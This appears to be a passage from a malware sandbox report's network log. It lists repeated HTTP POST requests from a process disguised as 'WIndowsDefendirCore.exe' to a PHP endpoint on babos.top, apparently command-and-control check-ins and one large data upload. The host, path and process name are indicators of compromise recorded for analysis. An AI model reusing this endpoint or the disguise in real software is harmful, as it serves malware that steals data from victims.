Date: Sat, 01 Feb 2025 18:22:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDra%2FwrciVeKbOQbusyKbr8TAbtWn2rbMGPN0yy4Mx%2BsV8waE%2BJYd01D5zKpcFVm0rCVIlNlzWKHTzTShGul5j7yczN6OuI29PvN9B0q25iZI7lraSIPoU%2FDl0g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7724acaf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=64542&min_rtt=26176&rtt_var=47257&sent=231&recv=193&lost=0&retrans=28&sent_bytes=55943&recv_bytes=83784&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9S%2BaTksvyJntg7DTLMiZehZvja1OTj3DwOevFTN5Lr3MQVVZtxzmFyVG8rCvFK9SLU1ArNPrKJIq9G1cpRcjbbrryHgIn0g%2F9PV2%2B%2FL2Rgu0WltHl7kMEJzcKk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f780df65f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=71299&min_rtt=26176&rtt_var=48956&sent=238&recv=198&lost=0&retrans=30&sent_bytes=56973&recv_bytes=85889&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ku1QuJj4vWKIz2X%2BeprC4BHL6rahIugcdRBz1OCo7vPXDhPgKHLcSOpvpMpMka0eUMSDQ5%2FoEkI0F35EOuR2IXVSMuwA6K3IRH2KJc9JmEP2FQJAiFBRsN7OrIQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7a79e6af1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=66790&min_rtt=26176&rtt_var=45734&sent=244&recv=202&lost=0&retrans=31&sent_bytes=57978&recv_bytes=87994&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy2wYv%2BCa3ZGslq1rVOob1c6FYQUkFxJLj0YQaQBj%2Brars0U41wTVI%2Binl%2FDYcLJe8UlMOyhGWUyhokPBWmLoPr4EwSnws%2Bk53Cdh0CIDS50nk0qAYKWZuuJZtI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7b8ca6bf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=66790&min_rtt=26176&rtt_var=45734&sent=252&recv=209&lost=0&retrans=34&sent_bytes=60931&recv_bytes=90099&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1828
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fIZtVnvUt3xD2X71fMJIjwlDuhraSBjItauN0AdW5QpBtWXRC3W3WCfLEez8Y9MUxH1DbGzOC0v%2BIcvmPK4zn3XziDL9lrXl4BKAvEiiilutES%2Bm0kgmc6S%2FGoI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7d4fac6f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=61892&min_rtt=26176&rtt_var=44096&sent=257&recv=213&lost=0&retrans=35&sent_bytes=61938&recv_bytes=92192&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzPx3p2AXFuMx12fOPN7KUNb%2B5AfrLrNsgSln4EFEBC7sUEN7feO5vOZ4afHvmTIPTXyjNP898NE5k742JQa%2F7gIvDA4e1mXAvv3KA%2FyLG7MxKyprymKAvZIPdA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7deab0ff1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=55800&min_rtt=26176&rtt_var=35236&sent=261&recv=217&lost=0&retrans=35&sent_bytes=62916&recv_bytes=94297&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFA2KtbGwyBpFJ7zzlb%2F%2BUa0nAyy2Fl%2BPzy4vEfwguqsVlwGwg0yLxRSEGGUsQ%2FKK6L%2FlOuwhUFBKSEInw9%2FWAL4La4ssNwKwra48CWVx67k5e27oxovS2iXHXU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7e62dc8f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=50537&min_rtt=26176&rtt_var=28576&sent=265&recv=221&lost=0&retrans=35&sent_bytes=63894&recv_bytes=96402&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=edMNB%2BBUS%2F7aOJs5%2FAEVcGHs8IWfN0AJYMSkR5GQGrUng4t2KmsJTyL1QlSbUyN90l2t259e393LV8m45tkVSdxEihcHO9Uxf4OM%2FL1d9TcK17SbIoLGDMT0CY4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7edda5ff1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=45810&min_rtt=26176&rtt_var=24105&sent=269&recv=225&lost=0&retrans=35&sent_bytes=64878&recv_bytes=98507&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEDd082RXF5%2BidxdNPnDf56KqzB81lL6tqJjlLtwTdM1RQdmy5PQ2BCuNh0G3Ls4q3px1e1ptxI2xsIXHp0JULyC09R8zBH2Ly%2Ff5r1Qt%2BOhmfVFcE6gRLQIpis%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7f7fc64f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=47029&min_rtt=26176&rtt_var=20517&sent=275&recv=229&lost=0&retrans=37&sent_bytes=66818&recv_bytes=100612&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xAxTl0EhI%2FDHBIua%2B7MrFDEo%2BQWEJrR75dH1t4knQl1v%2FIZ1tHKbAn2fPwRUCaiu%2BEVDhbiNoshDlPRvHkZ%2BaM2%2BUmKxPOwIzgdBCWnDP6oe7fnzlfbG4DvYRRI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7ff893af1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=46773&min_rtt=26176&rtt_var=19906&sent=279&recv=233&lost=0&retrans=37&sent_bytes=67797&recv_bytes=102717&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c69XpBEJ%2FzgqvKE3fuk5BtJ2O4v2eXRqYZiwdg1S8Z3ijnCu%2Ft79R2cUId%2BG%2BVEufWsGrvXkhqPQVQBCe9Wn%2Fmd1UGix2Q3gssFNV63KI6YoGIfmnukYEtWc7xo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f8074c81f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=42455&min_rtt=26176&rtt_var=18616&sent=283&recv=237&lost=0&retrans=37&sent_bytes=68784&recv_bytes=104822&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ied4hp6SuAjwZSayywd9A%2BnhbBB4sTJK%2BVuGnS9QWX%2B3tjdUtI%2FFTzCC511%2B4NHrnDdkMJZ1pBfOKWzeUce4gNRIu4LHHJSeiAj%2FIWIv5rW50cT2YPK6yS0CQxI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f80f18f3f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=40179&min_rtt=26176&rtt_var=14747&sent=287&recv=241&lost=0&retrans=37&sent_bytes=69767&recv_bytes=106927&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QpSzwB0PeNypJPuSNgEEnyrLpjLmtv%2Fm2h4R4aSTEJDg07EBJLTlvdBIoLcczEOA98Bq69yZ4IU6WWXISYNg2QxeIlJyN71eCk0nXao3OEHwctmrHMRKrVTyowo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f816be5ef1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=37113&min_rtt=26176&rtt_var=13590&sent=291&recv=245&lost=0&retrans=37&sent_bytes=70752&recv_bytes=109032&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OevsLCWZyqM74hpAulVa3ZjWD3ur2DOn8h7ZhZz0w%2Ful2Tgnm%2F3EFi93NvpRma9gkCCNsISXoqXCxY%2BsJMtRZcihstvv8h0HBPfEY%2B16rKevjKsMHwB%2BGcJa3rA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f820ba08f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35764&min_rtt=26176&rtt_var=12890&sent=298&recv=250&lost=0&retrans=37&sent_bytes=71727&recv_bytes=111137&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEUVl7RvdrxXk3NZEw7A%2Fl6uaZwqscO28fc0z9KBdXJXBJh6daa0kT5dE68h19D6ddHntuEttvgNPyqb4YbVI%2FaLWeCBjDfqn8N%2BFo07UX%2F46tR%2BRyT6e%2FpXPeI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f827fc5ef1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=75348&min_rtt=26176&rtt_var=79066&sent=303&recv=256&lost=0&retrans=38&sent_bytes=72735&recv_bytes=113242&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wp%2FuyA8OHzVboju0pAtAL%2F%2BCxLf7BmvmOwzZgn8Hu1hyQSfHb1LS67LB%2Bmc61t1jvM%2BOW473%2F58xQjfw%2FEsApl03%2BSt2%2FkYxmOxHqJWwcwmt%2Bt2GI6poRNY4oBE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f831cccef1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=63855&min_rtt=26127&rtt_var=64391&sent=307&recv=260&lost=0&retrans=38&sent_bytes=73720&recv_bytes=115347&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BV%2FpQ%2Fw6uM3KM7ucOvHptumguHG3yTVakF3M52pjZvQ3Gkq9TR0N%2B7g%2FCsYbHw8jcVKlpPYhwKDD7l7B46eYAb2AsqR3ZhhmfYu6ZCmsPe13GLFcxLIHJ25gKg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f83939b0f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=55953&min_rtt=26127&rtt_var=49890&sent=311&recv=264&lost=0&retrans=38&sent_bytes=74713&recv_bytes=117452&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM8JnqpeaHsgST42zapXA3J7RIUeBnOwec5aWYiCqD1TMviYvluZjXd8bS%2FzbtQVsmjtqsRYdVDt%2FMYrFERrm1%2B0efvQYlqczUgf0cywOMi2CTg70DMxRREhv6s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f840cd55f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=49461&min_rtt=26127&rtt_var=39194&sent=315&recv=268&lost=0&retrans=38&sent_bytes=75696&recv_bytes=119557&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pI3MlxllbEJzH3545DGC0Z4TN7Ds%2BpLzgZ17xAL50YF1O%2F7hjDsDQrVV9rTR9CGWGZFFlwtt65CDdFMsF2amKUE1AeGmoS8zC2P1J%2FjXWPgsEiv1dPHVKO2HRZ8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f8488a1df1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=46677&min_rtt=26127&rtt_var=27447&sent=319&recv=272&lost=0&retrans=38&sent_bytes=76675&recv_bytes=121662&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1076
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RFZaaVMcq2zfb%2FMIjYzalfJvp39vDBTWOINMuyrkGWrgIStOjlA5BF89r6XPxDXn7wQ7DiZO2AY5ulIoLHT5c%2Bv4EckYGY9dcye1mk1Y5IeOPBARSL%2FfO8sXe0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5a0ffb876d7-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=45185&min_rtt=44973&rtt_var=17016&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1341&delivery_rate=30173&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 128108
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5sT6pCGBnLFQu8Vq74v3SpdeNeA%2BJ%2BwELZoBsafo%2BVOXOjEC9sepeKHL9vrj0qNruyehhJPe%2B11%2F4ZeVjvG9YbqybJQEo1cbaVgzPebj%2BADtO%2FvyTfmKv0HPKAc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
